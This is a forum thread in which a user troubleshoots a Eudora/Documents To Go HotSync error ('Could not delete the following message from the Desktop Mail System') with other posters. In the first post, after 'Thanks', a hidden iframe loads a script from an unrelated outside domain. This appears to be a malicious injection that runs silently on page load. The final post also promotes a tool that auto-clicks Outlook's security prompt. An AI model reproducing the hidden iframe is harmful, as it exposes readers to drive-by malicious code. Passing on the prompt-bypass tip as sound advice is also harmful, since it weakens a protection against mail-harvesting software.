    eudora error message

    Eudora Error Message
When i hotsync i get the following error message:

Could not delete the following message from the Desktop Mail System

I have deleted the message from outlook 2002 and resyncd, no luck
I have soft reset my palm and resyncd, no luck
I have turned off all the conduits and resyncd, no luck
I have had desktop overright palm, no luck
I have had Palm overight desktop, no luck.

I have reviewed the threads regarding this error message (which I started before) and have followed all the tips. I still get this message and it only appears on the computer not the phone since doing the tips.

Now how do it get it off the computer error log????

    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Does it delete other messages, and has a problem with just one of them? I am assuming the function with kinks here is that you are deleting an email on the 7135, and it is trying to delete that message on Outlook.

    What version of Outlook?
    Have you tried reinstalling EIS?
Have you verified the email it's trying to delete is in Outlook?
Does manually removing it from Outlook rectify the problem?
Can you run a verbose logging Hotsync manager and sync to get more detail?

I am thinking either a) the email message doesn't exist in Outlook, yet Eudora has flagged it as a "delete from desktop" as if it were previously synced, b) something is holding onto that particular email in Outlook (maybe a return-receipt header not yet accessed?), or c) about a million other reasons....

Verbose logging should give more insight. Try "undeleting" the email back to the inbox in Eudora so it will sync it. Then maybe it will delete. It sounds like, more than anything, a mix up in the tagging of a particular file that is now stuck in limbo.

    EUDORA ERROR

I use outlook 2002 and Dataviz Desktop to go

I have told DTG to over write the palm
I have deleted all the files mentioned
and the message comes up only on the computer.

Yes it is only one message
It never was in outlook, but to be safe i just dumped the trash in outlook and still no luck there
    Cleared the mailboxes in eurdora

Now i get the same message but a different email appears as what is the problem. The email exists not on either platform I have made sure it was deleted on both the 7135 and the computer.

    Any ideas now?

That's weird. Youa re talking about two different things here. Desktop 2 Go and Eudora are seperate. Which was giving you the error? Where you using InBox2Go?

    desktop to go

No i dont use inbox to go

what happened was i tried to send a reply with eudora and it didnt send and stayed in my outbox.

then i synced and thought it was all gone. Well i was wrong.

then the error started and i was only able to rid my phone of the error by deleting the files.

maybe it was also stuck in my palm desktop?

    Anyway im working good now

    and by they way....
http://www.express-soft.com/mailmate/clickyes.html is a great work around for the security error on eudora syncing...
